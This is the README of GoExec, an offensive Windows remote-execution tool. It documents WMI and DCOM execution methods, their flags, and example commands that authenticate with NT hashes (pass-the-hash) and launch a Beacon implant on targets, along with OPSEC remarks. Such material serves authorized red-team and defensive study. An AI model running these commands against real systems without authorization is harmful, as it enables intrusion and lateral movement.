GoExec - Remote Execution Multitool

GoExec is a new take on some of the methods used to gain remote execution on Windows devices. GoExec implements a number of largely unrealized execution methods and provides significant OPSEC improvements overall.

The original post about GoExec v0.1.0 can be found here

Installation

Build & Install with Go

To build this project from source, you will need Go version 1.23.* or greater and a 64-bit target architecture. More information on managing Go installations can be found here

# Install goexec (release)
go install -ldflags="-s -w" -trimpath "github.com/FalconOpsLLC/goexec@latest"

Manual Installation

For pre-release features, fetch the latest commit and build manually.

# Install goexec (development)
go install -ldflags="-s -w" -trimpath "github.com/FalconOpsLLC/goexec@main"

Install with Docker

We've provided a Dockerfile to build and run GoExec within Docker containers.

# (Linux) Install GoExec Docker image
# Fetch source
git clone https://github.com/FalconOpsLLC/goexec
cd goexec

# Build goexec image; Must be root or docker group member.
docker build . --tag goexec

# Run goexec via Docker container
alias goexec='sudo docker run -it --rm goexec'
goexec -h # display help menu

Install from Release

You may also download the latest release for 64-bit Windows, macOS, or Linux.

Usage

GoExec is made up of modules for each remote service used (i.e. wmi, scmr, etc.), and specific methods within each module (i.e. wmi proc, scmr change, etc.)

Usage:
  goexec [command] [flags]

Execution Commands:
  dcom        Execute with Distributed Component Object Model (MS-DCOM)
  wmi         Execute with Windows Management Instrumentation (MS-WMI)
  scmr        Execute with Service Control Manager Remote (MS-SCMR)
  tsch        Execute with Windows Task Scheduler (MS-TSCH)

Additional Commands:
  help        Help about any command
  completion  Generate the autocompletion script for the specified shell

Logging:
  -D, --debug           Enable debug logging
  -O, --log-file file   Write JSON logging output to file
  -j, --json            Write logging output in JSON lines
  -q, --quiet           Disable info logging

Authentication:
  -u, --user user@domain      Username ('user@domain', 'domain\user', 'domain/user' or 'user')
  -p, --password string       Password
  -H, --nt-hash hash          NT hash ('NT', ':NT' or 'LM:NT')
      --aes-key hex key       Kerberos AES hex key
      --pfx file              Client certificate and private key as PFX file
      --pfx-password string   Password for PFX file
      --ccache file           Kerberos CCache file name (defaults to $KRB5CCNAME, currently unset)
      --dc string             Domain controller
  -k, --kerberos              Use Kerberos authentication

Fetching Remote Process Output

Although not recommended for live engagements or monitored environments due to OPSEC concerns, we've included the optional ability to fetch program output via SMB file transfer with the -o/--out flag. Use of this flag will wrap the supplied command in cmd.exe /c... >\Windows\Temp\RANDOM where RANDOM is a random GUID, then fetch the output file via SMB file transfer. By default, the output collection will time out after 1 minute, but this can be adjusted with the --out-timeout flag.

WMI Module (wmi)

The wmi module uses remote Windows Management Instrumentation (WMI) to spawn processes (wmi proc), or manually call a method (wmi call).

Usage:
  goexec wmi [command] [flags]

Available Commands:
  proc        Start a Windows process
  call        Execute specified WMI method

... [inherited flags] ...

Network:
  -x, --proxy URI           Proxy URI
  -F, --epm-filter string   String binding to filter endpoints returned by the RPC endpoint mapper (EPM)
      --endpoint string     Explicit RPC endpoint definition
      --epm                 Use EPM to discover available bindings
      --no-sign             Disable signing on DCERPC messages
      --no-seal             Disable packet stub encryption on DCERPC message

Process Creation Method (wmi proc)

The proc method creates an instance of the Win32_Process WMI class, then calls the Create method to spawn a process with the provided arguments.

Usage:
  goexec wmi proc [target] [flags]

Execution:
  -e, --exec string         Remote Windows executable to invoke
  -a, --args string         Process command line arguments
  -c, --command string      Windows process command line (executable &
                            arguments)
  -o, --out string          Fetch execution output to file or "-" for
                            standard output
  -m, --out-method string   Method to fetch execution output (default "smb")
      --no-delete-out       Preserve output file on remote filesystem
  -d, --directory string    Working directory (default "C:\\")

... [inherited flags] ...

Examples

# Run an executable without arguments
goexec wmi proc "$target" \
  -u "$auth_user" \
  -p "$auth_pass" \
  -e 'C:\Windows\Temp\Beacon.exe' \

# Authenticate with NT hash, fetch output from `cmd.exe /c whoami /all`
goexec wmi proc "$target" \
  -u "$auth_user" \
  -H "$auth_nt" \
  -e 'cmd.exe' \
  -a '/C whoami /all' \
  -o- # Fetch output to STDOUT

(Auxiliary) Call Method (wmi call)

The call method gives the operator full control over a WMI method call. You can list available classes and methods on Windows with PowerShell's Get-CimClass.

Usage:
  goexec wmi call [target] [flags]

WMI:
  -n, --namespace string   WMI namespace (default "//./root/cimv2")
  -C, --class string       WMI class to instantiate (i.e. "Win32_Process")
  -m, --method string      WMI Method to call (i.e. "Create")
  -A, --args string        WMI Method argument(s) in JSON dictionary format (i.e. {"Command":"calc.exe"}) (default "{}")

... [inherited flags] ...

Examples

# Call StdRegProv.EnumKey - enumerate registry subkeys of HKLM\SYSTEM
goexec wmi call "$target" \
    -u "$auth_user" \
    -p "$auth_pass" \
    -C 'StdRegProv' \
    -m 'EnumKey' \
    -A '{"sSubKeyName":"SYSTEM"}'

DCOM Module (dcom)

The dcom module uses exposed Distributed Component Object Model (DCOM) objects to gain remote execution.

[!WARNING] The DCOM module is generally less reliable than other modules because the underlying methods are often reliant on the target Windows version and specific Windows settings. Additionally, Kerberos auth is not officially supported by the DCOM module, but kudos if you can get it to work.

Usage:
  goexec dcom [command] [flags]

Available Commands:
  mmc                Execute with the MMC20.Application DCOM object
  shellwindows       Execute with the ShellWindows DCOM object
  shellbrowserwindow Execute with the ShellBrowserWindow DCOM object
  htafile            Execute with the HTAFile DCOM object
  excel              Execute with DCOM object(s) targeting Microsoft Excel
  visualstudio       Execute with DCOM object(s) targeting Microsoft Visual Studio

... [inherited flags] ...

Network:
  -x, --proxy URI            Proxy URI
  -F, --epm-filter binding   String binding to filter endpoints returned by the RPC endpoint mapper (EPM)
      --endpoint binding     Explicit RPC endpoint string binding
      --epm                  Use EPM to discover available bindings
      --no-sign              Disable signing on DCERPC messages
      --no-seal              Disable packet stub encryption on DCERPC messages

MMC20.Application Method (dcom mmc)

The mmc method instantiates a remote MMC20.Application object to call Document.ActiveView.ShellExec, and ultimately spawn a process on the remote host.

Usage:
  goexec dcom mmc [target] [flags]

Execution:
  -e, --exec string            Remote Windows executable to invoke
  -a, --args string            Process command line arguments
  -c, --command string         Windows process command line (executable & arguments)
  -o, --out file               Fetch execution output to file or "-" for standard output
  -m, --out-method Method      Method to fetch execution output (default "smb")
      --out-timeout duration   Output timeout duration (default 1m0s)
      --no-delete-out          Preserve output file on remote filesystem
      --directory directory    Working directory (default "C:\\")
      --window string          Window state (default "Minimized"

... [inherited flags] ...

Examples

# Authenticate with NT hash, fetch output from `cmd.exe /c whoami /priv` to file
goexec dcom mmc "$target" \
  -u "$auth_user" \
  -H "$auth_nt" \
  -e 'cmd.exe' \
  -a '/c whoami /priv' \
  -o ./privs.bin # Save output to ./privs.bin

ShellWindows Method (dcom shellwindows)

The shellwindows method uses a ShellWindows DCOM object to call Item().Document.Application.ShellExecute and spawn a remote process. This execution method isn't nearly as stable as the dcom mmc method for a few reasons:

• This method may not work on the latest Windows versions
• It may require that there is an active desktop session on the target machine.
• Successful execution may be on behalf of the desktop user, not necessarily an administrator.

Usage:
  goexec dcom shellwindows [target] [flags]

Execution:
  -e, --exec executable        Remote Windows executable to invoke
  -a, --args string            Process command line arguments
  -c,